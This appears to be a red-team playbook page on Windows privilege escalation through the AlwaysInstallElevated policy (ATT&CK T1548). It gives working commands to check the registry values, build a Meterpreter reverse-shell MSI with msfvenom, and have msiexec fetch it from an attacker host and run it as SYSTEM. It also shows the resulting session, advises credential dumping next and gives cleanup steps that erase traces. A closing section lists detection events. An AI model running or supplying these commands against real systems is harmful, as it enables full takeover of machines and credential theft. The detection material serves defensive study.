T1548: AlwaysInstallElevated
Technique Requirementsβ
| Privileges Required | Administrator (the technique grants SYSTEM - that is the point) |
| Effective Permissions | SYSTEM |
| Triggered By | Manual execution of a malicious MSI installer |
| Employment Complexity | 1/5 - Very Low (two registry checks + one msiexec command) |
| Detection Complexity | 2/5 - Low |
Backgroundβ
AlwaysInstallElevated is a Windows Group Policy setting that, when enabled, instructs the Windows Installer service to install every MSI package with SYSTEM privileges - regardless of who runs the installer. It exists for environments where standard users need to install software without admin rights, but it is a severe misconfiguration: any user who can run msiexec can escalate to SYSTEM on demand.
The policy is controlled by two registry values, both must be set to 1:
HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevatedHKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
If either value is absent or 0, the technique does not work. Both are required because the HKCU value allows the current user to request elevation, and the HKLM value allows the system to grant it - the installer checks both.
Why this is the first privesc to check: It requires zero exploitation, no service vulnerability, and no UAC bypass chain. It is either present or not. Check it during the discovery phase (T1082 Phase 6) before attempting any other privilege escalation path.
Proceduresβ
The following actions outline this privilege escalation plan:
- Both AlwaysInstallElevated registry values will be verified as enabled
- A malicious MSI payload will be generated on Kali
- The MSI will be transferred to the victim and executed with
msiexec - A SYSTEM Meterpreter session will be received
1. Check if AlwaysInstallElevated is enabledβ
Both values must be 0x1. Run this first - if either is absent or 0, skip this technique.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Positive result (vulnerable):
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
If either key is missing or the value is 0x0, this technique will not work - msiexec will install as the current user's context rather than SYSTEM.
2. Configure payload listenerβ
msfconsole -x "use exploit/multi/handler;
set payload windows/x64/meterpreter/reverse_https;
set LHOST 0.0.0.0;
set LPORT 443;
run -j;"
3. Generate and serve the MSI payloadβ
ATTACKER_IP="<ATTACKER_IP>"
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f msi -o elevated.msi
python3 -m http.server 8080
4. Execute on victim - download and install in one stepβ
msiexec /i http://<ATTACKER_IP>:8080/elevated.msi /qn
Or if already staged to disk:
msiexec /i C:\Windows\Temp\elevated.msi /qn
| Flag | Meaning |
|---|---|
/i | Install package |
/qn | Quiet - no UI, no prompts |
The installer runs as SYSTEM regardless of the calling user's privilege level. The Meterpreter stager fires from the SYSTEM context.
What to Expectβ
The session arrives as SYSTEM immediately after msiexec executes:
msf6 exploit(multi/handler) > [*] Sending stage (201798 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (0.0.0.0:443 -> 192.168.1.100:49203) at 2026-03-21 10:05:44
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
From a SYSTEM session, proceed directly to credential dumping - no UAC bypass required.
Cleanup - remove any partial installation registry entry left by the MSI:
# Check for leftover Uninstall entry:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s /f "meterpreter"
# Delete if found (substitute actual GUID):
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{GUID}" /f
# Delete staged MSI if not using the direct URL method:
del /f /q C:\Windows\Temp\elevated.msi
Log Detectionβ
- Source:
Microsoft-Windows-Sysmon/Operational- EventID:
1(ProcessCreate)msiexec.exewith/iand a URL or temp path argument - running as SYSTEM while the parent is a low-privileged user is the key anomaly
- EventID:
11(FileCreate)- MSI written to temp path prior to execution
- EventID:
13(Registry Value Set)AlwaysInstallElevatedset to1in either hive (if the policy was set by an attacker rather than pre-existing)
- EventID:
- Source:
Security- EventID:
4688(Process creation with command line auditing)msiexec.exe /i- particularly if the parent process is an unprivileged user shell and the resulting process token is SYSTEM
- EventID:
- Source:
System- EventID:
1033/1034(Windows Installer product installed/removed)- An MSI install from an unusual path or with no recognizable product name
- EventID: